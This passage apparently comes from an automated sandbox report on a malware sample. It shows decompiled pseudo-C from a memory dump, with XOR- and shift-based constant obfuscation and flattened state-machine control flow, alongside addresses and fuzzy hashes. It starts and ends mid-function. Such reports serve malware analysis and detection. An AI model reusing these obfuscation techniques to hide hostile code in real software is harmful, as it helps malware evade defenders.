                                                                                                                                                                                                                    							_t130 = 0x790ad55;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t130 == 0x6ea3bc6) {
                                                                                                                                                                                                                    								_t124 = E00A75C8A(_v552, __eflags,  &_v520, _t145, _v564);
                                                                                                                                                                                                                    								_t148 =  &(_t148[3]);
                                                                                                                                                                                                                    								__eflags = _t124;
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									_t130 = 0x7512124;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t130 == 0x7512124) {
                                                                                                                                                                                                                    									_t147 = E00A75011( &_v520, _v576, _v560);
                                                                                                                                                                                                                    									_t130 = 0x4c21736;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t130 == 0x790ad55) {
                                                                                                                                                                                                                    										_v576 = 0x7c59fc;
                                                                                                                                                                                                                    										_v576 = _v576 + 0xffff9eae;
                                                                                                                                                                                                                    										_v576 = _v576 ^ 0x2a5cf848;
                                                                                                                                                                                                                    										__eflags = _t129 - _v576;
                                                                                                                                                                                                                    										_t146 =  ==  ? 1 : _t146;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										if(_t130 != 0x999ead0) {
                                                                                                                                                                                                                    											goto L15;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_t130 = 0x461d75f;
                                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                    						return _t146;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t121 = E00A72160();
                                                                                                                                                                                                                    					_t145 = _t121;
                                                                                                                                                                                                                    					__eflags = _t121;
                                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                                    						_t130 = 0xb67506a;
                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						_t130 = 0x6ea3bc6;
                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L18;
                                                                                                                                                                                                                    					L15:
                                                                                                                                                                                                                    					__eflags = _t130 - 0xb67506a;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				goto L18;
                                                                                                                                                                                                                    			}


























                                                                                                                                                                                                                    0x00a70660
                                                                                                                                                                                                                    0x00a70666
                                                                                                                                                                                                                    0x00a7067a
                                                                                                                                                                                                                    0x00a7067b
                                                                                                                                                                                                                    0x00a7067f
                                                                                                                                                                                                                    0x00a70684
                                                                                                                                                                                                                    0x00a70685
                                                                                                                                                                                                                    0x00a70686
                                                                                                                                                                                                                    0x00a7068e
                                                                                                                                                                                                                    0x00a70696
                                                                                                                                                                                                                    0x00a7069e
                                                                                                                                                                                                                    0x00a706a6
                                                                                                                                                                                                                    0x00a706ae
                                                                                                                                                                                                                    0x00a706b6
                                                                                                                                                                                                                    0x00a706be
                                                                                                                                                                                                                    0x00a706c6
                                                                                                                                                                                                                    0x00a706ce
                                                                                                                                                                                                                    0x00a706d6
                                                                                                                                                                                                                    0x00a706de
                                                                                                                                                                                                                    0x00a706e6
                                                                                                                                                                                                                    0x00a706ee
                                                                                                                                                                                                                    0x00a706f6
                                                                                                                                                                                                                    0x00a706fe
                                                                                                                                                                                                                    0x00a7070b
                                                                                                                                                                                                                    0x00a7070e
                                                                                                                                                                                                                    0x00a7071a
                                                                                                                                                                                                                    0x00a7071e
                                                                                                                                                                                                                    0x00a70726
                                                                                                                                                                                                                    0x00a7072e
                                                                                                                                                                                                                    0x00a70733
                                                                                                                                                                                                                    0x00a7073b
                                                                                                                                                                                                                    0x00a70743
                                                                                                                                                                                                                    0x00a7074b
                                                                                                                                                                                                                    0x00a70757
                                                                                                                                                                                                                    0x00a7075a
                                                                                                                                                                                                                    0x00a7075e
                                                                                                                                                                                                                    0x00a70762
                                                                                                                                                                                                                    0x00a7076a
                                                                                                                                                                                                                    0x00a70772
                                                                                                                                                                                                                    0x00a70777
                                                                                                                                                                                                                    0x00a7077f
                                                                                                                                                                                                                    0x00a70787
                                                                                                                                                                                                                    0x00a7078f
                                                                                                                                                                                                                    0x00a70797
                                                                                                                                                                                                                    0x00a7079f
                                                                                                                                                                                                                    0x00a707a7
                                                                                                                                                                                                                    0x00a707af
                                                                                                                                                                                                                    0x00a707b3
                                                                                                                                                                                                                    0x00a707b7
                                                                                                                                                                                                                    0x00a707c4
                                                                                                                                                                                                                    0x00a707c8
                                                                                                                                                                                                                    0x00a707d0
                                                                                                                                                                                                                    0x00a707d8
                                                                                                                                                                                                                    0x00a707e0
                                                                                                                                                                                                                    0x00a707e8
                                                                                                                                                                                                                    0x00a707f0
                                                                                                                                                                                                                    0x00a707f8
                                                                                                                                                                                                                    0x00a70800
                                                                                                                                                                                                                    0x00a70800
                                                                                                                                                                                                                    0x00a70812
                                                                                                                                                                                                                    0x00a70897
                                                                                                                                                                                                                    0x00a7089c
                                                                                                                                                                                                                    0x00a7089f
                                                                                                                                                                                                                    0x00a708a1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a70814
                                                                                                                                                                                                                    0x00a7081a
                                                                                                                                                                                                                    0x00a7086c
                                                                                                                                                                                                                    0x00a70871
                                                                                                                                                                                                                    0x00a70874
                                                                                                                                                                                                                    0x00a70876
                                                                                                                                                                                                                    0x00a7087c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7087c
                                                                                                                                                                                                                    0x00a7081c
                                                                                                                                                                                                                    0x00a70822
                                                                                                                                                                                                                    0x00a70855
                                                                                                                                                                                                                    0x00a70857
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a70824
                                                                                                                                                                                                                    0x00a7082a
                                                                                                                                                                                                                    0x00a708db
                                                                                                                                                                                                                    0x00a708e5
                                                                                                                                                                                                                    0x00a708ee
                                                                                                                                                                                                                    0x00a708fa
                                                                                                                                                                                                                    0x00a708fc
                                                                                                                                                                                                                    0x00a70830
                                                                                                                                                                                                                    0x00a70836
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7083c
                                                                                                                                                                                                                    0x00a7083c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7083c
                                                                                                                                                                                                                    0x00a70836
                                                                                                                                                                                                                    0x00a7082a
                                                                                                                                                                                                                    0x00a70822
                                                                                                                                                                                                                    0x00a7081a
                                                                                                                                                                                                                    0x00a70900
                                                                                                                                                                                                                    0x00a7090b
                                                                                                                                                                                                                    0x00a7090b
                                                                                                                                                                                                                    0x00a708b3
                                                                                                                                                                                                                    0x00a708b8
                                                                                                                                                                                                                    0x00a708ba
                                                                                                                                                                                                                    0x00a708bc
                                                                                                                                                                                                                    0x00a708c8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a708be
                                                                                                                                                                                                                    0x00a708be
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a708be
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a708cd
                                                                                                                                                                                                                    0x00a708cd
                                                                                                                                                                                                                    0x00a708cd
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: /o]3$48($5.S9$`$&
                                                                                                                                                                                                                    • API String ID: 0-1987433424
                                                                                                                                                                                                                    • Opcode ID: ef07ab1e0305e14da51a37640ef5742625b209a88489025ca2d7cc1e9c1c745d
                                                                                                                                                                                                                    • Instruction ID: becd4b66f2dcf0d79b2dd8e43a09173358b535a7112b8054b07b274a98ac9bc7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef07ab1e0305e14da51a37640ef5742625b209a88489025ca2d7cc1e9c1c745d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D55134B1508341CFC358DF25C88591BBBE2FBD8358F108A1DF59AA6260D774DA4ACB87
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                    			E00A7A797(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                                                                                    				char _v604;
                                                                                                                                                                                                                    				void* _t148;
                                                                                                                                                                                                                    				void* _t149;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v76 = _v76 & 0x00000000;
                                                                                                                                                                                                                    				_v84 = 0x4d308a;
                                                                                                                                                                                                                    				_v80 = 0x4e3e3f;
                                                                                                                                                                                                                    				_v40 = 0xb27893;
                                                                                                                                                                                                                    				_v40 = _v40 + 0x7c21;
                                                                                                                                                                                                                    				_v40 = _v40 << 0xd;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x5e90bd8f;
                                                                                                                                                                                                                    				_v60 = 0x15ebeb;
                                                                                                                                                                                                                    				_v60 = _v60 << 0xc;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x5eb66788;
                                                                                                                                                                                                                    				_v12 = 0x15ccb5;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x31ce4b28;
                                                                                                                                                                                                                    				_v12 = _v12 + 0xfffff54c;
                                                                                                                                                                                                                    				_v12 = _v12 >> 0xb;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x000f6d19;
                                                                                                                                                                                                                    				_v52 = 0xf6d54f;
                                                                                                                                                                                                                    				_v52 = _v52 | 0x09d26e76;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x09fb865a;
                                                                                                                                                                                                                    				_v44 = 0x71b6c4;
                                                                                                                                                                                                                    				_v44 = _v44 | 0x5c9e60b0;
                                                                                                                                                                                                                    				_v44 = _v44 + 0x54d1;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x5d0a8355;
                                                                                                                                                                                                                    				_v68 = 0x3e5885;
                                                                                                                                                                                                                    				_v68 = _v68 + 0xa07d;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x0032e8e7;
                                                                                                                                                                                                                    				_v72 = 0x9ff836;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x3f;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x275a1213;
                                                                                                                                                                                                                    				_v36 = 0xa9943b;
                                                                                                                                                                                                                    				_v36 = _v36 >> 3;
                                                                                                                                                                                                                    				_v36 = _v36 << 3;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x00a331eb;
                                                                                                                                                                                                                    				_v8 = 0xcdbfb5;
                                                                                                                                                                                                                    				_v8 = _v8 << 0xd;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xe60cd938;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xbc2c37c0;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xeddacefe;
                                                                                                                                                                                                                    				_v32 = 0x4ab36a;
                                                                                                                                                                                                                    				_v32 = _v32 << 1;
                                                                                                                                                                                                                    				_v32 = _v32 >> 0x10;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x00090c1a;
                                                                                                                                                                                                                    				_v56 = 0xa8f7c9;
                                                                                                                                                                                                                    				_v56 = _v56 + 0xd961;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x00a7c8aa;
                                                                                                                                                                                                                    				_v20 = 0xa43d3c;
                                                                                                                                                                                                                    				_v20 = _v20 << 2;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0xca05fe46;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x85c75756;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x4d503c19;
                                                                                                                                                                                                                    				_v64 = 0x657a4b;
                                                                                                                                                                                                                    				_v64 = _v64 >> 0xc;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x000df748;
                                                                                                                                                                                                                    				_v24 = 0x28f8ba;
                                                                                                                                                                                                                    				_v24 = _v24 >> 3;
                                                                                                                                                                                                                    				_v24 = _v24 | 0x526ae59c;
                                                                                                                                                                                                                    				_v24 = _v24 >> 6;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x01405a5d;
                                                                                                                                                                                                                    				_v16 = 0x345bc2;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0xaedcc796;
                                                                                                                                                                                                                    				_v16 = _v16 + 0x46c9;
                                                                                                                                                                                                                    				_v16 = _v16 | 0xa29d1cae;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0xaefa7dcc;
                                                                                                                                                                                                                    				_v48 = 0x979562;
                                                                                                                                                                                                                    				_v48 = _v48 * 0x35;
                                                                                                                                                                                                                    				_v48 = _v48 * 3;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x5e2629d5;
                                                                                                                                                                                                                    				_v28 = 0xfc2b7d;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x9006e4d1;
                                                                                                                                                                                                                    				_v28 = _v28 + 0xa2ca;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x90ff4675;
                                                                                                                                                                                                                    				_t148 = E00A75011( *0xa83b38 + 0xc, _v40, _v60);
                                                                                                                                                                                                                    				_t172 = _a4 + 0x2c;
                                                                                                                                                                                                                    				_t149 = E00A66877(_v12, _t148, _v52, _a4 + 0x2c);
                                                                                                                                                                                                                    				_t181 = _t149;
                                                                                                                                                                                                                    				if(_t149 != 0) {
                                                                                                                                                                                                                    					_push(_v36);
                                                                                                                                                                                                                    					_push(_v72);
                                                                                                                                                                                                                    					_push(_v68);
                                                                                                                                                                                                                    					E00A7E773(_v32, _t181, _t172, _v56, _a8,  &_v604, E00A81E60(0xa610fc, _v44, _t181),  *((intOrPtr*)(_a8 + 0x28)), _v20);
                                                                                                                                                                                                                    					E00A7D6DF(_v64, _t152, _v24, _v16);
                                                                                                                                                                                                                    					E00A7A9FE(_v48,  &_v604, _v28);
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                    			}


























                                                                                                                                                                                                                    0x00a7a7a1
                                                                                                                                                                                                                    0x00a7a7a5
                                                                                                                                                                                                                    0x00a7a7ac
                                                                                                                                                                                                                    0x00a7a7b3
                                                                                                                                                                                                                    0x00a7a7ba
                                                                                                                                                                                                                    0x00a7a7c1
                                                                                                                                                                                                                    0x00a7a7c5
                                                                                                                                                                                                                    0x00a7a7cc
                                                                                                                                                                                                                    0x00a7a7d3
                                                                                                                                                                                                                    0x00a7a7d7
                                                                                                                                                                                                                    0x00a7a7de
                                                                                                                                                                                                                    0x00a7a7e5
                                                                                                                                                                                                                    0x00a7a7ec
                                                                                                                                                                                                                    0x00a7a7f3
                                                                                                                                                                                                                    0x00a7a7f7
                                                                                                                                                                                                                    0x00a7a7fe
                                                                                                                                                                                                                    0x00a7a805
                                                                                                                                                                                                                    0x00a7a80c
                                                                                                                                                                                                                    0x00a7a813
                                                                                                                                                                                                                    0x00a7a81a
                                                                                                                                                                                                                    0x00a7a821
                                                                                                                                                                                                                    0x00a7a828
                                                                                                                                                                                                                    0x00a7a82f
                                                                                                                                                                                                                    0x00a7a836
                                                                                                                                                                                                                    0x00a7a83d
                                                                                                                                                                                                                    0x00a7a844
                                                                                                                                                                                                                    0x00a7a84f
                                                                                                                                                                                                                    0x00a7a852
                                                                                                                                                                                                                    0x00a7a859
                                                                                                                                                                                                                    0x00a7a860
                                                                                                                                                                                                                    0x00a7a864
                                                                                                                                                                                                                    0x00a7a868
                                                                                                                                                                                                                    0x00a7a86f
                                                                                                                                                                                                                    0x00a7a876
                                                                                                                                                                                                                    0x00a7a87a
                                                                                                                                                                                                                    0x00a7a881
                                                                                                                                                                                                                    0x00a7a888
                                                                                                                                                                                                                    0x00a7a88f
                                                                                                                                                                                                                    0x00a7a896
                                                                                                                                                                                                                    0x00a7a899
                                                                                                                                                                                                                    0x00a7a89d
                                                                                                                                                                                                                    0x00a7a8a4
                                                                                                                                                                                                                    0x00a7a8ab
                                                                                                                                                                                                                    0x00a7a8b2
                                                                                                                                                                                                                    0x00a7a8b9
                                                                                                                                                                                                                    0x00a7a8c0
                                                                                                                                                                                                                    0x00a7a8c4
                                                                                                                                                                                                                    0x00a7a8cb
                                                                                                                                                                                                                    0x00a7a8d2
                                                                                                                                                                                                                    0x00a7a8d9
                                                                                                                                                                                                                    0x00a7a8e0
                                                                                                                                                                                                                    0x00a7a8e4
                                                                                                                                                                                                                    0x00a7a8eb
                                                                                                                                                                                                                    0x00a7a8f2
                                                                                                                                                                                                                    0x00a7a8f6
                                                                                                                                                                                                                    0x00a7a8fd
                                                                                                                                                                                                                    0x00a7a901
                                                                                                                                                                                                                    0x00a7a908
                                                                                                                                                                                                                    0x00a7a90f
                                                                                                                                                                                                                    0x00a7a916
                                                                                                                                                                                                                    0x00a7a91d
                                                                                                                                                                                                                    0x00a7a924
                                                                                                                                                                                                                    0x00a7a92b
                                                                                                                                                                                                                    0x00a7a936
                                                                                                                                                                                                                    0x00a7a93d
                                                                                                                                                                                                                    0x00a7a940
                                                                                                                                                                                                                    0x00a7a947
                                                                                                                                                                                                                    0x00a7a94e
                                                                                                                                                                                                                    0x00a7a955
                                                                                                                                                                                                                    0x00a7a95c
                                                                                                                                                                                                                    0x00a7a972
                                                                                                                                                                                                                    0x00a7a97a
                                                                                                                                                                                                                    0x00a7a986
                                                                                                                                                                                                                    0x00a7a98e
                                                                                                                                                                                                                    0x00a7a990
                                                                                                                                                                                                                    0x00a7a993
                                                                                                                                                                                                                    0x00a7a99b
                                                                                                                                                                                                                    0x00a7a99e
                                                                                                                                                                                                                    0x00a7a9ca
                                                                                                                                                                                                                    0x00a7a9da
                                                                                                                                                                                                                    0x00a7a9eb
                                                                                                                                                                                                                    0x00a7a9f3
                                                                                                                                                                                                                    0x00a7a9fb

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                                                                                                    • String ID: !|$?>N$Kze$2
                                                                                                                                                                                                                    • API String ID: 1586166983-332967888
                                                                                                                                                                                                                    • Opcode ID: cc145699c789b520001d9f300c43b011d0f243b16be65c9b53db9f7d50d9c278
                                                                                                                                                                                                                    • Instruction ID: 55b5f388aca024d38bca1185df1353b6b25c158094ef479243c4e9a31834216a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc145699c789b520001d9f300c43b011d0f243b16be65c9b53db9f7d50d9c278
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A661FB72C0121CEBCF49DFA1D98A4EEBBB1FF44318F208158D426B6260C7B50A4ACF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A67361(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                    				void* _t111;
                                                                                                                                                                                                                    				void* _t114;
                                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                                    				signed int _t117;
                                                                                                                                                                                                                    				signed int _t118;
                                                                                                                                                                                                                    				void* _t121;
                                                                                                                                                                                                                    				void* _t137;
                                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                                    				signed int* _t141;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_t137 = __ecx;
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t99);
                                                                                                                                                                                                                    				_v28 = 0x280a38;
                                                                                                                                                                                                                    				_t141 =  &(( &_v64)[5]);
                                                                                                                                                                                                                    				_v28 = _v28 + 0xa23a;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x00240c13;
                                                                                                                                                                                                                    				_t138 = 0;
                                                                                                                                                                                                                    				_v64 = 0xf6ac45;
                                                                                                                                                                                                                    				_t121 = 0xf3d4752;
                                                                                                                                                                                                                    				_t116 = 0x32;
                                                                                                                                                                                                                    				_v64 = _v64 * 0x4d;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffffe5f6;
                                                                                                                                                                                                                    				_v64 = _v64 + 0xffff7beb;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0x4a326a44;
                                                                                                                                                                                                                    				_v32 = 0xc35fb9;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x2099e926;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x2054d216;
                                                                                                                                                                                                                    				_v48 = 0xc60df;
                                                                                                                                                                                                                    				_v48 = _v48 / _t116;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x2e88e241;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x2e86fe9a;
                                                                                                                                                                                                                    				_v52 = 0xea027b;
                                                                                                                                                                                                                    				_t117 = 0x71;
                                                                                                                                                                                                                    				_v52 = _v52 * 0x77;
                                                                                                                                                                                                                    				_v52 = _v52 / _t117;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x00f82eec;
                                                                                                                                                                                                                    				_v56 = 0x527326;
                                                                                                                                                                                                                    				_v56 = _v56 | 0xff2118ac;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x9031a1b3;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x6f430b03;
                                                                                                                                                                                                                    				_v36 = 0xea7e82;
                                                                                                                                                                                                                    				_v36 = _v36 >> 6;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x00009f91;
                                                                                                                                                                                                                    				_v60 = 0xe6afb9;
                                                                                                                                                                                                                    				_t118 = 0x76;
                                                                                                                                                                                                                    				_v60 = _v60 * 0x53;
                                                                                                                                                                                                                    				_v60 = _v60 + 0x2180;
                                                                                                                                                                                                                    				_v60 = _v60 + 0xb398;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x4ac851ed;
                                                                                                                                                                                                                    				_v40 = 0x66b8fd;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xffff65e3;
                                                                                                                                                                                                                    				_v40 = _v40 + 0xca16;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x006de52e;
                                                                                                                                                                                                                    				_v44 = 0x2cbbac;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x6ae97ca4;
                                                                                                                                                                                                                    				_v44 = _v44 / _t118;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x00ee61a9;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t121 != 0x223729b) {
                                                                                                                                                                                                                    						if(_t121 == 0x8c10aa0) {
                                                                                                                                                                                                                    							E00A773B3(_v28, _v64,  &_v24, _a4, _v32, _v48);
                                                                                                                                                                                                                    							_t141 =  &(_t141[4]);
                                                                                                                                                                                                                    							_t121 = 0xc396d21;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t121 == 0xc396d21) {
                                                                                                                                                                                                                    								_t114 = E00A7223A(_v52,  &_v24, __eflags, _t137, _v56, _v36);
                                                                                                                                                                                                                    								_t141 =  &(_t141[3]);
                                                                                                                                                                                                                    								__eflags = _t114;
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									_t121 = 0x223729b;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t121 != 0xf3d4752) {
                                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									_t121 = 0x8c10aa0;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t111 = E00A7223A(_v60,  &_v24, __eflags, _t137 + 0x14, _v40, _v44);
                                                                                                                                                                                                                    					_t141 =  &(_t141[3]);
                                                                                                                                                                                                                    					__eflags = _t111;
                                                                                                                                                                                                                    					_t138 =  !=  ? 1 : _t138;
                                                                                                                                                                                                                    					_t121 = 0x854651a;
                                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                                    					__eflags = _t121 - 0x854651a;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				L11:
                                                                                                                                                                                                                    				return _t138;
                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                    0x00a67368
                                                                                                                                                                                                                    0x00a6736c
                                                                                                                                                                                                                    0x00a6736e
                                                                                                                                                                                                                    0x00a67372
                                                                                                                                                                                                                    0x00a67376
                                                                                                                                                                                                                    0x00a67377
                                                                                                                                                                                                                    0x00a67378
                                                                                                                                                                                                                    0x00a6737d
                                                                                                                                                                                                                    0x00a67385
                                                                                                                                                                                                                    0x00a67388
                                                                                                                                                                                                                    0x00a67392
                                                                                                                                                                                                                    0x00a6739a
                                                                                                                                                                                                                    0x00a6739c
                                                                                                                                                                                                                    0x00a673a4
                                                                                                                                                                                                                    0x00a673b5
                                                                                                                                                                                                                    0x00a673b8
                                                                                                                                                                                                                    0x00a673bc
                                                                                                                                                                                                                    0x00a673c4
                                                                                                                                                                                                                    0x00a673cc
                                                                                                                                                                                                                    0x00a673d4
                                                                                                                                                                                                                    0x00a673dc
                                                                                                                                                                                                                    0x00a673e4
                                                                                                                                                                                                                    0x00a673ec
                                                                                                                                                                                                                    0x00a673fc
                                                                                                                                                                                                                    0x00a67400
                                                                                                                                                                                                                    0x00a67408
                                                                                                                                                                                                                    0x00a67410
                                                                                                                                                                                                                    0x00a6741d
                                                                                                                                                                                                                    0x00a67420
                                                                                                                                                                                                                    0x00a6742c
                                                                                                                                                                                                                    0x00a67430
                                                                                                                                                                                                                    0x00a67438
                                                                                                                                                                                                                    0x00a67440
                                                                                                                                                                                                                    0x00a67448
                                                                                                                                                                                                                    0x00a67450
                                                                                                                                                                                                                    0x00a67458
                                                                                                                                                                                                                    0x00a67460
                                                                                                                                                                                                                    0x00a67465
                                                                                                                                                                                                                    0x00a6746d
                                                                                                                                                                                                                    0x00a6747a
                                                                                                                                                                                                                    0x00a6747b
                                                                                                                                                                                                                    0x00a6747f
                                                                                                                                                                                                                    0x00a67487
                                                                                                                                                                                                                    0x00a6748f
                                                                                                                                                                                                                    0x00a67497
                                                                                                                                                                                                                    0x00a6749f
                                                                                                                                                                                                                    0x00a674a7
                                                                                                                                                                                                                    0x00a674af
                                                                                                                                                                                                                    0x00a674b7
                                                                                                                                                                                                                    0x00a674bf
                                                                                                                                                                                                                    0x00a674d2
                                                                                                                                                                                                                    0x00a674d6
                                                                                                                                                                                                                    0x00a674de
                                                                                                                                                                                                                    0x00a674de
                                                                                                                                                                                                                    0x00a674e4
                                                                                                                                                                                                                    0x00a67534
                                                                                                                                                                                                                    0x00a67539
                                                                                                                                                                                                                    0x00a6753c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a674e6
                                                                                                                                                                                                                    0x00a674ec
                                                                                                                                                                                                                    0x00a6750b
                                                                                                                                                                                                                    0x00a67510
                                                                                                                                                                                                                    0x00a67513
                                                                                                                                                                                                                    0x00a67515
                                                                                                                                                                                                                    0x00a67517
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a67517
                                                                                                                                                                                                                    0x00a674ee
                                                                                                                                                                                                                    0x00a674f4
                                                                                                                                                                                                                    0x00000000
